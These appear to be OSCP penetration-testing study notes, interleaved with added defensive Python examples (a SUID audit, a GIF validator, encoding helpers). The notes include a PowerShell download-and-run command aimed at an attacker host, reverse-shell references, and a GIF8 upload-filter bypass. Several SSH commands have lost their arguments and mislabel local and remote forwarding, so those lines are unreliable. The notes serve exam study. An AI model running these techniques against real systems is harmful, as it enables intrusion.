Tips and Tricks

OSCP Notes

Best Practices

  1. Always add an /etc/hosts entry for the servers you are working on, especially for web apps, so that you can explore virtual hosts.

  2. It's good practice to list all files under the home directories first - find /home -type f -printf "%f\t%p\t%u\t%g\t%m\n" - followed by a SUID binary search - find / -perm -4000 2>/dev/null - or find all SUID/SGID files on the whole system with - find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null

  3. Read banner information and any README files, since you can sometimes gather additional information that tools have missed. Also read the SSL certificate to learn about any other domains/subdomains the certificate applies to, or for the registrant information, email, etc.

  4. Before brute forcing accounts for SSH/FTP etc., try to read the authentication policies to avoid lockouts or IP bans.

  5. Updated wordlists are better - /usr/share/seclists
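The SUID/SGID search in tip 2 is just as useful from the audit side: a script that reports the same fields as the find -printf command and compares them with a known-good list makes a newly appeared setuid binary stand out. The following is an added example written for these notes, not a tool from the original page; the baseline list and the default /usr root are assumptions, and the only sample input is the temporary directory a test would create.

```python
# Added example (not from the original notes): SUID/SGID audit that mirrors
# `find -type f -printf "%f\t%p\t%u\t%g\t%m"` and diffs the result against a
# baseline list so new setuid/setgid files are flagged.
# Paths, baseline entries and the default root are assumptions.
import grp
import os
import pwd
import stat
from typing import Dict, List, Tuple


def _name_of_uid(uid: int) -> str:
    try:
        return pwd.getpwuid(uid).pw_name
    except KeyError:
        return str(uid)  # uid without a passwd entry, print it numerically like find does


def _name_of_gid(gid: int) -> str:
    try:
        return grp.getgrgid(gid).gr_name
    except KeyError:
        return str(gid)


def find_setid_files(root: str) -> Dict[str, Tuple[str, str, str, str]]:
    """Walk `root` and return {path: (basename, owner, group, octal_mode)} for
    every regular file with the setuid or setgid bit set. Symlinks are skipped
    via lstat, mirroring `find -type f`; unreadable entries are ignored like
    `2>/dev/null`."""
    found: Dict[str, Tuple[str, str, str, str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                mode = oct(stat.S_IMODE(st.st_mode))[2:]
                found[path] = (name, _name_of_uid(st.st_uid), _name_of_gid(st.st_gid), mode)
    return found


def diff_against_baseline(current: Dict[str, tuple], baseline: List[str]) -> Tuple[List[str], List[str]]:
    """Return (new_paths, missing_paths) relative to a known-good path list."""
    base = set(baseline)
    cur = set(current)
    return sorted(cur - base), sorted(base - cur)


def format_report(found: Dict[str, Tuple[str, str, str, str]]) -> str:
    """Tab-separated lines in the same order as the find -printf format: name, path, user, group, mode."""
    lines = []
    for path in sorted(found):
        name, user, group, mode = found[path]
        lines.append(f"{name}\t{path}\t{user}\t{group}\t{mode}")
    return "\n".join(lines)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr"  # assumed default root
    report = find_setid_files(root)
    print(format_report(report))
```

Run it once on a freshly built host, save the paths as the baseline, and re-run periodically; anything in the "new" list deserves a look, since a setuid binary that was not there at build time is exactly what the find command in tip 2 is meant to surface.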

Reverse Shells

  1. ippsec's tiny shell command: < . Now you can pass a command to the variable "ipp" to run on the target, or even to get the reverse shell.
  2. Collection of bind and reverse shells that give you a PTY - https://github.com/infodox/python-pty-shells

Cool tips

How to improve to a better shell with hotkeys

When you already have a shell via - python -c 'import pty; pty.spawn("/bin/bash")' - but the shell lacks support for hotkeys, vi, etc., the following steps will improve your shell experience -

  1. Send current shell to background using CTRL + Z
  2. type - stty raw -echo and hit ENTER twice
  3. fg to foreground your shell
  4. Now, you should have a better shell!

SSH tips and Tricks

  1. Local Port forwarding: ssh -R :127.0.0.1: @
  2. Remote port forwarding: ssh -fNL :localhost: @
  3. Use of a jump host: ssh -J username@jumphost :localhost: @
  4. You will run into odd issues if the file permissions on id_rsa*, authorized_keys files are too open. Also, try to stage these files on a regular filesystem instead of /tmp.

File transfers

  1. On Windows:
    1. powershell "IEX(New-Object Net.WebClient).downloadString('http://attack-machine-ip:<port>/filename.ext')"
    2. On the attack machine (Kali), start SMB using impacket-smbserver pwd, then on the target machine access \<share><filename>. This can be useful when doing lateral movement in the lab.

  2. If you are facing issues with quotes/spaces/special characters when transferring files to Windows machines, use iconv to convert the file to the Windows text encoding and then base64 encode it: echo "hello world" | iconv -t UTF-16LE | base64 -w0 | xclip -selection primary

Compiling Code

  1. When compiling with gcc, you may need to pass the -fPIC option to compile on 64-bit machines.

Tools and online references

  1. Python unicorn ( https://github.com/trustedsec/unicorn)
  2. PEDA
  3. To use the GPU version of John to crack faster if you have a GPU-equipped machine or a crackbox -
    1. Jumbo John - https://github.com/openwall/john
    2. This version of John requires the following - https://github.com/stricture/hashstack-server-plugin-jtr/blob/master/scrapers/sshng2john.py
  4. ASCII table key reference - http://www.asciitable.com
  5. Cipher Tools : http://www.rumkin.com/tools
  6. exiftool for analyzing images, logos
  7. Droopescan for scanning Drupal websites
  8. PowerUp.ps1 script to automate a lot of stuff (Empire)
  9. Dirsearch (Python; alternative to dirbuster and gobuster)
  10. Firefox add-ons:
    1. FoxyProxy
    2. Quick Cookie Manager or Cookie Manager
  11. Padbuster
  12. Microsoft sysinternals toolkit - https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

Reading/Common Blindspots

  1. Familiarize yourself with popular exploits such as dirtycow, eternalblue, etc.
  2. Buffer Overflow:
    1. ASLR/DEP context
    2. gdb
    3. peda
  3. Google: PHP Filter LFI
  4. DNS zone transfer and enumeration
  5. When using local exploit suggester modules/scripts, make sure to run them against the same processor architecture (32/64 bit) as the target.
  6. Making a quick GIF file for a reverse shell is much easier: just add GIF8 at the top of the file. For other file types, to add the magic bytes you need to use a hex editor to update the headers.
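The GIF8 trick in item 6 works because many upload filters compare only the first few bytes. The other side of that lesson is what a stricter check looks like: a validator that parses the full GIF signature, the Logical Screen Descriptor and the trailer byte rejects a file that merely begins with GIF8. The following is an added example written for these notes (not code from the original page); the two sample inputs are constructed in the script itself, and the "classify" labels are assumptions.

```python
# Added example (not from the original notes): a server-side GIF check that
# goes beyond a four-byte magic comparison. Sample inputs are constructed here.
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")


def is_plausible_gif(data: bytes) -> bool:
    """True only if `data` has a full 6-byte GIF signature, a Logical Screen
    Descriptor with non-zero dimensions, a first block that is an image
    descriptor (0x2C) or extension (0x21), and the 0x3B trailer at the end."""
    if len(data) < 6 + 7 + 1:
        return False
    if data[:6] not in GIF_SIGNATURES:
        return False
    # Logical Screen Descriptor: width, height (little-endian u16), packed flags,
    # background colour index, pixel aspect ratio
    width, height, packed, _bg, _aspect = struct.unpack("<HHBBB", data[6:13])
    if width == 0 or height == 0:
        return False
    offset = 13
    if packed & 0x80:  # global colour table present: 3 bytes per entry, 2^(n+1) entries
        offset += 3 * (2 ** ((packed & 0x07) + 1))
        if len(data) < offset + 1:
            return False
    if data[offset] not in (0x2C, 0x21):
        return False
    return data[-1] == 0x3B


def classify_upload(data: bytes) -> str:
    """Label an upload: 'gif' passes the structural check, 'magic-only-gif'
    starts with GIF8 but is not a parseable GIF, anything else is 'unknown'."""
    if is_plausible_gif(data):
        return "gif"
    if data[:4] == b"GIF8":
        return "magic-only-gif"
    return "unknown"


# Constructed sample: a 1x1 GIF89a with a two-entry global colour table,
# one image descriptor, a minimal LZW data block and the trailer.
SAMPLE_REAL_GIF = (
    b"GIF89a"
    + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    + b"\xff\xff\xff\x00\x00\x00"
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
    + b"\x02\x02\x44\x01\x00"
    + b"\x3b"
)

# Constructed sample: text with "GIF8" prepended, the case item 6 describes.
SAMPLE_FAKE = b"GIF8" + b"; this is plain text, not an image"


if __name__ == "__main__":
    for label, blob in (("real", SAMPLE_REAL_GIF), ("fake", SAMPLE_FAKE)):
        print(label, classify_upload(blob))
```

The check is deliberately structural rather than content-based: it does not try to guess what the rest of the file contains, it only refuses to believe a file is a GIF unless the parts every GIF must have are actually present.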

Python Proficiency

  1. Hex and Ascii conversion
  2. File read/write operations
  3. Modules: Requests, Sockets
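The encoding steps from the file-transfer tip (iconv -t UTF-16LE followed by base64) and the first two items of this list fit in one small toolbox. The following is an added example written for these notes, not code from the original page: it reproduces that pipeline in Python, shows why the base64 form survives quoting, and rounds a string through hex/ASCII and through a file. The file path is an assumption and the sample strings are constructed here.

```python
# Added example (not from the original notes): Python equivalents of
# `iconv -t UTF-16LE | base64 -w0`, plus hex/ASCII and file round-trips.
# Paths and sample strings are assumptions/constructed.
import base64
import string
from pathlib import Path

_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def to_utf16le_b64(text: str) -> str:
    """Encode `text` as UTF-16LE (what Windows tools expect; no BOM, like
    iconv -t UTF-16LE) and base64 it so quotes, spaces and special
    characters survive a copy/paste or a command line."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def from_utf16le_b64(blob: str) -> str:
    """Reverse of to_utf16le_b64; validate=True rejects stray characters."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def is_paste_safe(blob: str) -> bool:
    """True when the string contains only base64 characters, i.e. nothing a
    shell or PowerShell quoting rule could mangle."""
    return all(ch in _B64_ALPHABET for ch in blob)


def ascii_to_hex(text: str) -> str:
    return text.encode("ascii").hex()


def hex_to_ascii(hexstr: str) -> str:
    try:
        return bytes.fromhex(hexstr).decode("ascii")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError(f"not valid ASCII hex: {exc}") from exc


def write_then_read(path: str, text: str) -> str:
    """Write `text` to `path` as UTF-16LE bytes and read it back, the file
    equivalent of staging a converted script for transfer."""
    p = Path(path)
    p.write_bytes(text.encode("utf-16-le"))
    return p.read_bytes().decode("utf-16-le")


if __name__ == "__main__":
    sample = 'quoted "text" & $pecial chars'  # constructed sample
    blob = to_utf16le_b64(sample)
    print(blob, is_paste_safe(blob), from_utf16le_b64(blob) == sample)
    print(ascii_to_hex("ABC"), hex_to_ascii("414243"))
```

Note the UTF-16LE step: base64 of plain UTF-8 would be just as paste-safe, but the decoded bytes would not be what a Windows consumer expecting UTF-16LE reads, which is why the original tip chains iconv before base64.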